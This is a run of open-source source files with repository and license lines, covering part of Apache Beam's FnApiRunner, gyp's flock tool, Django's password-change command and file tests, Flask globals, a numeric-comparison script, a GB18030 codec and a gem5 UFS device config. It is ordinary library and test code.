if (isinstance(operation.source.source, worker_runner_base.InMemorySource) and isinstance(operation.source.source.default_output_coder(), WindowedValueCoder)): output_stream = create_OutputStream() element_coder = ( operation.source.source.default_output_coder().get_impl()) # Re-encode the elements in the nested context and # concatenate them together for element in operation.source.source.read(None): element_coder.encode_to_stream(element, output_stream, True) target_name = self._next_uid() input_data[(transform_id, target_name)] = output_stream.get() fn = beam_fn_api_pb2.FunctionSpec(urn=sdk_worker.DATA_INPUT_URN, id=self._next_uid()) if data_operation_spec: fn.data.Pack(data_operation_spec) inputs = {target_name: beam_fn_api_pb2.Target.List()} side_inputs = {} else: # Read the source object from the runner. source_coder = beam.coders.DillCoder() input_transform_id = self._next_uid() output_stream = create_OutputStream() source_coder.get_impl().encode_to_stream( GlobalWindows.windowed_value(operation.source), output_stream, True) target_name = self._next_uid() input_data[(input_transform_id, target_name)] = output_stream.get() input_ptransform = beam_fn_api_pb2.PrimitiveTransform( id=input_transform_id, function_spec=beam_fn_api_pb2.FunctionSpec( urn=sdk_worker.DATA_INPUT_URN, id=self._next_uid()), # TODO(robertwb): Possible name collision. step_name=stage_name + '/inject_source', inputs={target_name: beam_fn_api_pb2.Target.List()}, outputs={ 'out': beam_fn_api_pb2.PCollection( coder_reference=coder_id(source_coder)) }) if data_operation_spec: input_ptransform.function_spec.data.Pack(data_operation_spec) transforms.append(input_ptransform) # Read the elements out of the source. 
fn = sdk_worker.pack_function_spec_data( OLDE_SOURCE_SPLITTABLE_DOFN_DATA, sdk_worker.PYTHON_DOFN_URN, id=self._next_uid()) inputs = { 'ignored_input_tag': beam_fn_api_pb2.Target.List(target=[ beam_fn_api_pb2.Target( primitive_transform_reference=input_transform_id, name='out') ]) } side_inputs = {} elif isinstance(operation, operation_specs.WorkerDoFn): fn = sdk_worker.pack_function_spec_data( operation.serialized_fn, sdk_worker.PYTHON_DOFN_URN, id=self._next_uid()) inputs = as_target(operation.input) # Store the contents of each side input for state access. for si in operation.side_inputs: assert isinstance(si.source, iobase.BoundedSource) element_coder = si.source.default_output_coder() view_id = self._next_uid() # TODO(robertwb): Actually flesh out the ViewFn API. side_inputs[si.tag] = beam_fn_api_pb2.SideInput( view_fn=sdk_worker.serialize_and_pack_py_fn( element_coder, urn=sdk_worker.PYTHON_ITERABLE_VIEWFN_URN, id=view_id)) # Re-encode the elements in the nested context and # concatenate them together output_stream = create_OutputStream() for element in si.source.read( si.source.get_range_tracker(None, None)): element_coder.get_impl().encode_to_stream( element, output_stream, True) elements_data = output_stream.get() state_key = beam_fn_api_pb2.StateKey(function_spec_reference=view_id) state_handler.Clear(state_key) state_handler.Append( beam_fn_api_pb2.SimpleStateAppendRequest( state_key=state_key, data=[elements_data])) elif isinstance(operation, operation_specs.WorkerFlatten): fn = sdk_worker.pack_function_spec_data( operation.serialized_fn, sdk_worker.IDENTITY_DOFN_URN, id=self._next_uid()) inputs = { 'ignored_input_tag': beam_fn_api_pb2.Target.List(target=[ beam_fn_api_pb2.Target( primitive_transform_reference=transform_index_to_id[ input_op_index], name=output_tags(map_task[input_op_index][1])[ input_output_index]) for input_op_index, input_output_index in operation.inputs ]) } side_inputs = {} else: raise TypeError(operation) ptransform = 
beam_fn_api_pb2.PrimitiveTransform( id=transform_id, function_spec=fn, step_name=stage_name, inputs=inputs, side_inputs=side_inputs, outputs=outputs(operation)) transforms.append(ptransform) process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor( id=self._next_uid(), coders=coders.values(), primitive_transform=transforms) return beam_fn_api_pb2.InstructionRequest( instruction_id=self._next_uid(), register=beam_fn_api_pb2.RegisterRequest( process_bundle_descriptor=[process_bundle_descriptor ])), runner_sinks, input_data def _run_map_task( self, map_task, control_handler, state_handler, data_plane_handler, data_operation_spec): registration, sinks, input_data = self._map_task_registration( map_task, state_handler, data_operation_spec) control_handler.push(registration) process_bundle = beam_fn_api_pb2.InstructionRequest( instruction_id=self._next_uid(), process_bundle=beam_fn_api_pb2.ProcessBundleRequest( process_bundle_descriptor_reference=registration.register. process_bundle_descriptor[0].id)) for (transform_id, name), elements in input_data.items(): data_out = data_plane_handler.output_stream( process_bundle.instruction_id, beam_fn_api_pb2.Target( primitive_transform_reference=transform_id, name=name)) data_out.write(elements) data_out.close() control_handler.push(process_bundle) while True: result = control_handler.pull() if result.instruction_id == process_bundle.instruction_id: if result.error: raise RuntimeError(result.error) expected_targets = [ beam_fn_api_pb2.Target(primitive_transform_reference=transform_id, name=output_name) for (transform_id, output_name), _ in sinks.items()] for output in data_plane_handler.input_elements( process_bundle.instruction_id, expected_targets): target_tuple = ( output.target.primitive_transform_reference, output.target.name) if target_tuple not in sinks: # Unconsumed output. 
continue sink_op = sinks[target_tuple] coder = sink_op.output_coders[0] input_stream = create_InputStream(output.data) elements = [] while input_stream.size() > 0: elements.append(coder.get_impl().decode_from_stream( input_stream, True)) if not sink_op.write_windowed_values: elements = [e.value for e in elements] for e in elements: sink_op.output_buffer.append(e) return def execute_map_tasks(self, ordered_map_tasks, direct=True): if direct: controller = FnApiRunner.DirectController() else: controller = FnApiRunner.GrpcController() try: for _, map_task in ordered_map_tasks: logging.info('Running %s', map_task) self._run_map_task( map_task, controller.control_handler, controller.state_handler, controller.data_plane_handler, controller.data_operation_spec()) finally: controller.close() class SimpleState(object): # TODO(robertwb): Inherit from GRPC servicer. def __init__(self): self._all = collections.defaultdict(list) def Get(self, state_key): return beam_fn_api_pb2.Elements.Data( data=''.join(self._all[self._to_key(state_key)])) def Append(self, append_request): self._all[self._to_key(append_request.state_key)].extend( append_request.data) def Clear(self, state_key): try: del self._all[self._to_key(state_key)] except KeyError: pass @staticmethod def _to_key(state_key): return (state_key.function_spec_reference, state_key.window, state_key.key) class DirectController(object): """An in-memory controller for fn API control, state and data planes.""" def __init__(self): self._responses = [] self.state_handler = FnApiRunner.SimpleState() self.control_handler = self self.data_plane_handler = data_plane.InMemoryDataChannel() self.worker = sdk_worker.SdkWorker( self.state_handler, data_plane.InMemoryDataChannelFactory( self.data_plane_handler.inverse())) def push(self, request): logging.info('CONTROL REQUEST %s', request) response = self.worker.do_instruction(request) logging.info('CONTROL RESPONSE %s', response) self._responses.append(response) def pull(self): return 
self._responses.pop(0) def done(self): pass def close(self): pass def data_operation_spec(self): return None class GrpcController(object): """An grpc based controller for fn API control, state and data planes.""" def __init__(self): self.state_handler = FnApiRunner.SimpleState() self.control_server = grpc.server( futures.ThreadPoolExecutor(max_workers=10)) self.control_port = self.control_server.add_insecure_port('[::]:0') self.data_server = grpc.server(futures.ThreadPoolExecutor(max_workers=10)) self.data_port = self.data_server.add_insecure_port('[::]:0') self.control_handler = streaming_rpc_handler( beam_fn_api_pb2.BeamFnControlServicer, 'Control') beam_fn_api_pb2.add_BeamFnControlServicer_to_server( self.control_handler, self.control_server) self.data_plane_handler = data_plane.GrpcServerDataChannel() beam_fn_api_pb2.add_BeamFnDataServicer_to_server( self.data_plane_handler, self.data_server) logging.info('starting control server on port %s', self.control_port) logging.info('starting data server on port %s', self.data_port) self.data_server.start() self.control_server.start() self.worker = sdk_worker.SdkHarness( grpc.insecure_channel('localhost:%s' % self.control_port)) self.worker_thread = threading.Thread(target=self.worker.run) logging.info('starting worker') self.worker_thread.start() def data_operation_spec(self): url = 'localhost:%s' % self.data_port remote_grpc_port = beam_fn_api_pb2.RemoteGrpcPort() remote_grpc_port.api_service_descriptor.url = url return remote_grpc_port def close(self): self.control_handler.done() self.worker_thread.join() self.data_plane_handler.close() self.control_server.stop(5).wait() self.data_server.stop(5).wait()
apache-2.0
nicolieolieart/nicolieolieart.github.io
node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/flock_tool.py
1835
1748
#!/usr/bin/env python # Copyright (c) 2011 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """These functions are executed via gyp-flock-tool when using the Makefile generator. Used on systems that don't have a built-in flock.""" import fcntl import os import struct import subprocess import sys def main(args): executor = FlockTool() executor.Dispatch(args) class FlockTool(object): """This class emulates the 'flock' command.""" def Dispatch(self, args): """Dispatches a string command to a method.""" if len(args) < 1: raise Exception("Not enough arguments") method = "Exec%s" % self._CommandifyName(args[0]) getattr(self, method)(*args[1:]) def _CommandifyName(self, name_string): """Transforms a tool name like copy-info-plist to CopyInfoPlist""" return name_string.title().replace('-', '') def ExecFlock(self, lockfile, *cmd_list): """Emulates the most basic behavior of Linux's flock(1).""" # Rely on exception handling to report errors. # Note that the stock python on SunOS has a bug # where fcntl.flock(fd, LOCK_EX) always fails # with EBADF, that's why we use this F_SETLK # hack instead. fd = os.open(lockfile, os.O_WRONLY|os.O_NOCTTY|os.O_CREAT, 0666) if sys.platform.startswith('aix'): # Python on AIX is compiled with LARGEFILE support, which changes the # struct size. op = struct.pack('hhIllqq', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0) else: op = struct.pack('hhllhhl', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0) fcntl.fcntl(fd, fcntl.F_SETLK, op) return subprocess.call(cmd_list) if __name__ == '__main__': sys.exit(main(sys.argv[1:]))
mit
levigross/pyscanner
mytests/django/contrib/auth/management/commands/changepassword.py
97
1881
import getpass
from optparse import make_option

from django.core.management.base import BaseCommand, CommandError
from django.contrib.auth.models import User
from django.db import DEFAULT_DB_ALIAS


class Command(BaseCommand):
    """Interactively change a django.contrib.auth user's password."""

    option_list = BaseCommand.option_list + (
        make_option('--database', action='store', dest='database',
            default=DEFAULT_DB_ALIAS, help='Specifies the database to use. Default is "default".'),
    )
    help = "Change a user's password for django.contrib.auth."
    requires_model_validation = False

    def _get_pass(self, prompt="Password: "):
        # Prompt without echo; an empty response aborts the whole command.
        entered = getpass.getpass(prompt=prompt)
        if not entered:
            raise CommandError("aborted")
        return entered

    def handle(self, *args, **options):
        if len(args) > 1:
            raise CommandError("need exactly one or zero arguments for username")

        # With no explicit username, fall back to the invoking OS user.
        username = args[0] if args else getpass.getuser()

        try:
            user = User.objects.using(options.get('database')).get(username=username)
        except User.DoesNotExist:
            raise CommandError("user '%s' does not exist" % username)

        self.stdout.write("Changing password for user '%s'\n" % user.username)

        MAX_TRIES = 3
        mismatches = 0
        # Keep prompting until both entries agree or the attempt budget
        # (counted in mismatches) is exhausted.
        while mismatches < MAX_TRIES:
            first_entry = self._get_pass()
            second_entry = self._get_pass("Password (again): ")
            if first_entry == second_entry:
                break
            self.stdout.write("Passwords do not match. Please try again.\n")
            mismatches += 1
        if mismatches == MAX_TRIES:
            raise CommandError("Aborting password change for user '%s' after %s attempts" % (username, mismatches))

        user.set_password(first_entry)
        user.save()

        return "Password changed successfully for user '%s'" % user.username
mit
arju88nair/projectCulminate
venv/lib/python3.5/site-packages/flask/globals.py
322
1645
# -*- coding: utf-8 -*-
"""
    flask.globals
    ~~~~~~~~~~~~~

    Defines all the global objects that are proxies to the current
    active context.

    :copyright: (c) 2015 by Armin Ronacher.
    :license: BSD, see LICENSE for more details.
"""

from functools import partial
from werkzeug.local import LocalStack, LocalProxy


_request_ctx_err_msg = '''\
Working outside of request context.

This typically means that you attempted to use functionality that needed
an active HTTP request.  Consult the documentation on testing for
information about how to avoid this problem.\
'''
_app_ctx_err_msg = '''\
Working outside of application context.

This typically means that you attempted to use functionality that needed
to interface with the current application object in a way.  To solve
this set up an application context with app.app_context().  See the
documentation for more information.\
'''


def _top_or_raise(stack, error_message):
    # Shared guard: return the top of *stack*, or raise a RuntimeError with
    # the matching "working outside of ... context" message when no context
    # has been pushed.
    ctx = stack.top
    if ctx is None:
        raise RuntimeError(error_message)
    return ctx


def _lookup_req_object(name):
    # Resolve an attribute (request/session) on the active request context.
    return getattr(_top_or_raise(_request_ctx_stack, _request_ctx_err_msg),
                   name)


def _lookup_app_object(name):
    # Resolve an attribute (g) on the active application context.
    return getattr(_top_or_raise(_app_ctx_stack, _app_ctx_err_msg), name)


def _find_app():
    # The Flask application bound to the active application context.
    return _top_or_raise(_app_ctx_stack, _app_ctx_err_msg).app


# context locals
_request_ctx_stack = LocalStack()
_app_ctx_stack = LocalStack()
current_app = LocalProxy(_find_app)
request = LocalProxy(partial(_lookup_req_object, 'request'))
session = LocalProxy(partial(_lookup_req_object, 'session'))
g = LocalProxy(partial(_lookup_app_object, 'g'))
apache-2.0
BorisJeremic/Real-ESSI-Examples
valgrind_test/test_cases/8NodeBrick/cantilever_different_Poisson/NumberOfDivision4/PoissonRatio0.49/compare_txt.py
202
2092
#!/usr/bin/python
"""Compare an analytic scalar solution with a numeric result (Python 2 script).

Loads one value from each of two fixed text files, computes the relative
error and prints a colored report using the project-local helpers from the
``compare_function`` directory (mycomparator / mycolor_fun).
"""
import h5py
import sys
import numpy as np
import os
import re
import random

# find the path to my own python function:
# NOTE(review): assumes the CWD lies below a 'test_cases' directory; the
# prefix before that component is treated as the project root — confirm.
cur_dir=os.getcwd()
sep='test_cases'
test_DIR=cur_dir.split(sep,1)[0]
scriptDIR=test_DIR+'compare_function'
sys.path.append(scriptDIR)
# import my own function for color and comparator
from mycomparator import *
from mycolor_fun import *

# analytic_solution = sys.argv[1]
# numeric_result = sys.argv[2]
analytic_solution = 'analytic_solution.txt'
numeric_result = 'numeric_result.txt'
# Each file is expected to hold a single scalar (loadtxt yields a 0-d array).
analytic_sol = np.loadtxt(analytic_solution)
numeric_res = np.loadtxt(numeric_result)
abs_error = abs(analytic_sol - numeric_res)
# NOTE(review): divides by the analytic value — blows up if it is zero;
# presumably never zero for these test cases.
rel_error = abs_error/analytic_sol
analytic_sol = float(analytic_sol)
numeric_res = float(numeric_res)
rel_error = float(rel_error)

# print the results (Python 2 print statements; headrun/headstep/headOK/
# headOKCASE come from mycolor_fun and provide colored prefixes)
case_flag=1
print headrun() , "-----------Testing results-----------------"
print headstep() ,'{0} {1} {2} '.format('analytic_solution ','numeric_result ','error ')
print headOK() ,'{0:+e} {1:+e} {2:+0.2f} '.format(analytic_sol, numeric_res, rel_error )
if(case_flag==1):
    print headOKCASE(),"-----------Done this case!-----------------"

# legacy backup (kept as historical shell one-liners used to rename files)
# find . -name 'element.fei' -exec bash -c 'mv $0 ${0/element.fei/add_element.include}' {} \;
# find . -name 'constraint.fei' -exec bash -c 'mv $0 ${0/constraint.fei/add_constraint.include}' {} \;
# find . -name 'node.fei' -exec bash -c 'mv $0 ${0/node.fei/add_node.include}' {} \;
# find . -name 'add_node.fei' -exec bash -c 'mv $0 ${0/add_node.fei/add_node.include}' {} \;
# find . -name 'elementLT.fei' -exec bash -c 'mv $0 ${0/elementLT.fei/add_elementLT.include}' {} \;
# sed -i "s/node\.fei/add_node.include/" main.fei
# sed -i "s/add_node\.fei/add_node.include/" main.fei
# sed -i "s/element\.fei/add_element.include/" main.fei
# sed -i "s/elementLT\.fei/add_elementLT.include/" main.fei
# sed -i "s/constraint\.fei/add_constraint.include/" main.fei
# find . -name '*_bak.h5.feioutput' -exec bash -c 'mv $0 ${0/\_bak.h5.feioutput/\_original\.h5.feioutput}' {} \;
cc0-1.0
Leila20/django
tests/files/tests.py
16
12423
# -*- coding: utf-8 -*-
"""Tests for Django's file abstractions (django.core.files).

Covers the File/ContentFile wrappers, line iteration and newline handling,
image-dimension helpers, safe file moves and spooled temporary files.
"""
from __future__ import unicode_literals

import gzip
import os
import struct
import tempfile
import unittest
from io import BytesIO, StringIO, TextIOWrapper

from django.core.files import File
from django.core.files.base import ContentFile
from django.core.files.move import file_move_safe
from django.core.files.temp import NamedTemporaryFile
from django.core.files.uploadedfile import SimpleUploadedFile, UploadedFile
from django.test import mock
from django.utils import six
from django.utils._os import upath

try:
    from PIL import Image
except ImportError:
    # Image-dimension tests below are skipped when Pillow is unavailable.
    Image = None
else:
    from django.core.files import images


class FileTests(unittest.TestCase):
    """Behavior of the File wrapper: repr, context management, iteration."""

    def test_unicode_uploadedfile_name(self):
        uf = UploadedFile(name='¿Cómo?', content_type='text')
        self.assertIs(type(repr(uf)), str)

    def test_unicode_file_name(self):
        f = File(None, 'djángö')
        self.assertIs(type(repr(f)), str)

    def test_context_manager(self):
        # Leaving the with-block must close both the wrapper and the
        # underlying file object.
        orig_file = tempfile.TemporaryFile()
        base_file = File(orig_file)
        with base_file as f:
            self.assertIs(base_file, f)
            self.assertFalse(f.closed)
        self.assertTrue(f.closed)
        self.assertTrue(orig_file.closed)

    def test_namedtemporaryfile_closes(self):
        """
        The symbol django.core.files.NamedTemporaryFile is assigned as
        a different class on different operating systems. In
        any case, the result should minimally mock some of the API of
        tempfile.NamedTemporaryFile from the Python standard library.
        """
        tempfile = NamedTemporaryFile()
        self.assertTrue(hasattr(tempfile, "closed"))
        self.assertFalse(tempfile.closed)
        tempfile.close()
        self.assertTrue(tempfile.closed)

    def test_file_mode(self):
        # Should not set mode to None if it is not present.
        # See #14681, stdlib gzip module crashes if mode is set to None
        file = SimpleUploadedFile("mode_test.txt", b"content")
        self.assertFalse(hasattr(file, 'mode'))
        gzip.GzipFile(fileobj=file)

    def test_file_iteration(self):
        """
        File objects should yield lines when iterated over.
        Refs #22107.
        """
        file = File(BytesIO(b'one\ntwo\nthree'))
        self.assertEqual(list(file), [b'one\n', b'two\n', b'three'])

    def test_file_iteration_windows_newlines(self):
        """
        #8149 - File objects with \r\n line endings should yield lines
        when iterated over.
        """
        f = File(BytesIO(b'one\r\ntwo\r\nthree'))
        self.assertEqual(list(f), [b'one\r\n', b'two\r\n', b'three'])

    def test_file_iteration_mac_newlines(self):
        """
        #8149 - File objects with \r line endings should yield lines
        when iterated over.
        """
        f = File(BytesIO(b'one\rtwo\rthree'))
        self.assertEqual(list(f), [b'one\r', b'two\r', b'three'])

    def test_file_iteration_mixed_newlines(self):
        f = File(BytesIO(b'one\rtwo\nthree\r\nfour'))
        self.assertEqual(list(f), [b'one\r', b'two\n', b'three\r\n', b'four'])

    def test_file_iteration_with_unix_newline_at_chunk_boundary(self):
        f = File(BytesIO(b'one\ntwo\nthree'))
        # Set chunk size to create a boundary after \n:
        # b'one\n...
        #        ^
        f.DEFAULT_CHUNK_SIZE = 4
        self.assertEqual(list(f), [b'one\n', b'two\n', b'three'])

    def test_file_iteration_with_windows_newline_at_chunk_boundary(self):
        f = File(BytesIO(b'one\r\ntwo\r\nthree'))
        # Set chunk size to create a boundary between \r and \n:
        # b'one\r\n...
        #        ^
        f.DEFAULT_CHUNK_SIZE = 4
        self.assertEqual(list(f), [b'one\r\n', b'two\r\n', b'three'])

    def test_file_iteration_with_mac_newline_at_chunk_boundary(self):
        f = File(BytesIO(b'one\rtwo\rthree'))
        # Set chunk size to create a boundary after \r:
        # b'one\r...
        #        ^
        f.DEFAULT_CHUNK_SIZE = 4
        self.assertEqual(list(f), [b'one\r', b'two\r', b'three'])

    def test_file_iteration_with_text(self):
        f = File(StringIO('one\ntwo\nthree'))
        self.assertEqual(list(f), ['one\n', 'two\n', 'three'])

    def test_readable(self):
        # readable() must flip to False after the context closes the file.
        with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file:
            self.assertTrue(test_file.readable())
        self.assertFalse(test_file.readable())

    def test_writable(self):
        with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file:
            self.assertTrue(test_file.writable())
        self.assertFalse(test_file.writable())
        # A file opened read-only is never writable.
        with tempfile.TemporaryFile('rb') as temp, File(temp, name='something.txt') as test_file:
            self.assertFalse(test_file.writable())

    def test_seekable(self):
        with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file:
            self.assertTrue(test_file.seekable())
        self.assertFalse(test_file.seekable())

    def test_io_wrapper(self):
        content = "vive l'été\n"
        with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file:
            test_file.write(content.encode('utf-8'))
            test_file.seek(0)
            wrapper = TextIOWrapper(test_file, 'utf-8', newline='\n')
            self.assertEqual(wrapper.read(), content)
            # The following seek() call is required on Windows Python 2 when
            # switching from reading to writing.
            wrapper.seek(0, 2)
            wrapper.write(content)
            wrapper.seek(0)
            self.assertEqual(wrapper.read(), content * 2)
            test_file = wrapper.detach()
            test_file.seek(0)
            self.assertEqual(test_file.read(), (content * 2).encode('utf-8'))


class NoNameFileTestCase(unittest.TestCase):
    """
    Other examples of unnamed files may be tempfile.SpooledTemporaryFile or
    urllib.urlopen()
    """
    def test_noname_file_default_name(self):
        self.assertIsNone(File(BytesIO(b'A file with no name')).name)

    def test_noname_file_get_size(self):
        self.assertEqual(File(BytesIO(b'A file with no name')).size, 19)


class ContentFileTestCase(unittest.TestCase):
    def test_content_file_default_name(self):
        self.assertIsNone(ContentFile(b"content").name)

    def test_content_file_custom_name(self):
        """
        Test that the constructor of ContentFile accepts 'name' (#16590).
        """
        name = "I can have a name too!"
        self.assertEqual(ContentFile(b"content", name=name).name, name)

    def test_content_file_input_type(self):
        """
        Test that ContentFile can accept both bytes and unicode and that the
        retrieved content is of the same type.
        """
        self.assertIsInstance(ContentFile(b"content").read(), bytes)
        # On Python 2 text input is coerced to bytes on read.
        if six.PY3:
            self.assertIsInstance(ContentFile("español").read(), six.text_type)
        else:
            self.assertIsInstance(ContentFile("español").read(), bytes)


class DimensionClosingBug(unittest.TestCase):
    """
    Test that get_image_dimensions() properly closes files (#8817)
    """
    @unittest.skipUnless(Image, "Pillow not installed")
    def test_not_closing_of_files(self):
        """
        Open files passed into get_image_dimensions() should stay opened.
        """
        empty_io = BytesIO()
        try:
            images.get_image_dimensions(empty_io)
        finally:
            self.assertTrue(not empty_io.closed)

    @unittest.skipUnless(Image, "Pillow not installed")
    def test_closing_of_filenames(self):
        """
        get_image_dimensions() called with a filename should closed the file.
        """
        # We need to inject a modified open() builtin into the images module
        # that checks if the file was closed properly if the function is
        # called with a filename instead of an file object.
        # get_image_dimensions will call our catching_open instead of the
        # regular builtin one.

        class FileWrapper(object):
            # Records a True entry each time close() is called on a wrapper.
            _closed = []

            def __init__(self, f):
                self.f = f

            def __getattr__(self, name):
                return getattr(self.f, name)

            def close(self):
                self._closed.append(True)
                self.f.close()

        def catching_open(*args):
            return FileWrapper(open(*args))

        images.open = catching_open
        try:
            images.get_image_dimensions(os.path.join(os.path.dirname(upath(__file__)), "test1.png"))
        finally:
            del images.open
        self.assertTrue(FileWrapper._closed)


class InconsistentGetImageDimensionsBug(unittest.TestCase):
    """
    Test that get_image_dimensions() works properly after various calls
    using a file handler (#11158)
    """
    @unittest.skipUnless(Image, "Pillow not installed")
    def test_multiple_calls(self):
        """
        Multiple calls of get_image_dimensions() should return the same size.
        """
        img_path = os.path.join(os.path.dirname(upath(__file__)), "test.png")
        with open(img_path, 'rb') as fh:
            image = images.ImageFile(fh)
            image_pil = Image.open(fh)
            size_1 = images.get_image_dimensions(image)
            size_2 = images.get_image_dimensions(image)
        self.assertEqual(image_pil.size, size_1)
        self.assertEqual(size_1, size_2)

    @unittest.skipUnless(Image, "Pillow not installed")
    def test_bug_19457(self):
        """
        Regression test for #19457
        get_image_dimensions fails on some pngs, while Image.size is working
        good on them
        """
        img_path = os.path.join(os.path.dirname(upath(__file__)), "magic.png")
        size = images.get_image_dimensions(img_path)
        with open(img_path, 'rb') as fh:
            self.assertEqual(size, Image.open(fh).size)


@unittest.skipUnless(Image, "Pillow not installed")
class GetImageDimensionsTests(unittest.TestCase):

    def test_invalid_image(self):
        """
        get_image_dimensions() should return (None, None) for the dimensions
        of invalid images (#24441).

        brokenimg.png is not a valid image and it has been generated by:
        $ echo "123" > brokenimg.png
        """
        img_path = os.path.join(os.path.dirname(upath(__file__)), "brokenimg.png")
        with open(img_path, 'rb') as fh:
            size = images.get_image_dimensions(fh)
            self.assertEqual(size, (None, None))

    def test_valid_image(self):
        """
        get_image_dimensions() should catch struct.error while feeding the PIL
        Image parser (#24544).

        Emulates the Parser feed error. Since the error is raised on every
        feed attempt, the resulting image size should be invalid: (None, None).
        """
        img_path = os.path.join(os.path.dirname(upath(__file__)), "test.png")
        with mock.patch('PIL.ImageFile.Parser.feed', side_effect=struct.error):
            with open(img_path, 'rb') as fh:
                size = images.get_image_dimensions(fh)
                self.assertEqual(size, (None, None))


class FileMoveSafeTests(unittest.TestCase):
    def test_file_move_overwrite(self):
        handle_a, self.file_a = tempfile.mkstemp()
        handle_b, self.file_b = tempfile.mkstemp()

        # file_move_safe should raise an IOError exception if destination file exists and allow_overwrite is False
        with self.assertRaises(IOError):
            file_move_safe(self.file_a, self.file_b, allow_overwrite=False)

        # should allow it and continue on if allow_overwrite is True
        self.assertIsNone(file_move_safe(self.file_a, self.file_b, allow_overwrite=True))

        os.close(handle_a)
        os.close(handle_b)


class SpooledTempTests(unittest.TestCase):
    def test_in_memory_spooled_temp(self):
        # Size must be computed even while the data is still held in memory.
        with tempfile.SpooledTemporaryFile() as temp:
            temp.write(b"foo bar baz quux\n")
            django_file = File(temp, name="something.txt")
            self.assertEqual(django_file.size, 17)

    def test_written_spooled_temp(self):
        # max_size=4 forces the spooled file to roll over to disk first.
        with tempfile.SpooledTemporaryFile(max_size=4) as temp:
            temp.write(b"foo bar baz quux\n")
            django_file = File(temp, name="something.txt")
            self.assertEqual(django_file.size, 17)
bsd-3-clause
MrLoick/python-for-android
python3-alpha/python3-src/Lib/encodings/gb18030.py
816
1031
#
# gb18030.py: Python Unicode Codec for GB18030
#
# Written by Hye-Shik Chang <perky@FreeBSD.org>
#

import _codecs_cn
import codecs
import _multibytecodec as mbc

# The C-level stateful GB18030 implementation that every class below
# delegates to.
codec = _codecs_cn.getcodec('gb18030')


class Codec(codecs.Codec):
    # Stateless one-shot encode/decode entry points.
    encode = codec.encode
    decode = codec.decode


class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
                         codecs.IncrementalEncoder):
    codec = codec


class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
                         codecs.IncrementalDecoder):
    codec = codec


class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
    codec = codec


class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
    codec = codec


def getregentry():
    """Return the CodecInfo record handed to the codec registry."""
    stateless = Codec()
    return codecs.CodecInfo(
        name='gb18030',
        encode=stateless.encode,
        decode=stateless.decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
apache-2.0
nilmini20s/gem5-2016-08-13
src/dev/arm/UFSHostDevice.py
38
3533
# Copyright (c) 2013-2015 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Rene de Jong
#

import sys

from m5.params import *
from m5.proxy import *
from Device import DmaDevice
from AbstractNVM import *


# gem5 SimObject parameter declaration for the UFS (Universal Flash
# Storage) host controller model backed by dev/arm/ufs_device.hh.
class UFSHostDevice(DmaDevice):
    type = 'UFSHostDevice'
    cxx_header = "dev/arm/ufs_device.hh"
    # Base address of the memory-mapped SCSI configuration interface.
    pio_addr = Param.Addr("Address for SCSI configuration slave interface")
    pio_latency = Param.Latency("10ns", "Time between action and write/read \
result by AMBA DMA Device")
    gic = Param.BaseGic(Parent.any, "Gic to use for interrupting")
    int_num = Param.UInt32("Interrupt number that connects to GIC")
    img_blk_size = Param.UInt32(512, "Size of one image block in bytes")

    # Every image that is added to the vector will generate a new logic unit
    # in the UFS device; Theoretically (when using the driver from Linux
    # kernel 3.9 onwards), this can be as many as eigth. Up to two have been
    # tested.
    image = VectorParam.DiskImage("Disk images")

    # Every logic unit can have its own flash dimensions. So the number of
    # images that have been provided in the image vector, should be equal to
    # the number of flash objects that are created. Each logic unit can have
    # its own flash dimensions; to allow the system to define a hetrogeneous
    # storage system.
    internalflash = VectorParam.AbstractNVM("Describes the internal flash")
    ufs_slots = Param.UInt32(32, "Number of commands that can be queued in \
the Host controller (min: 1, max: 32)")
bsd-3-clause
shakamunyi/neutron-vrrp
neutron/plugins/ml2/drivers/type_flat.py
13
5104
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
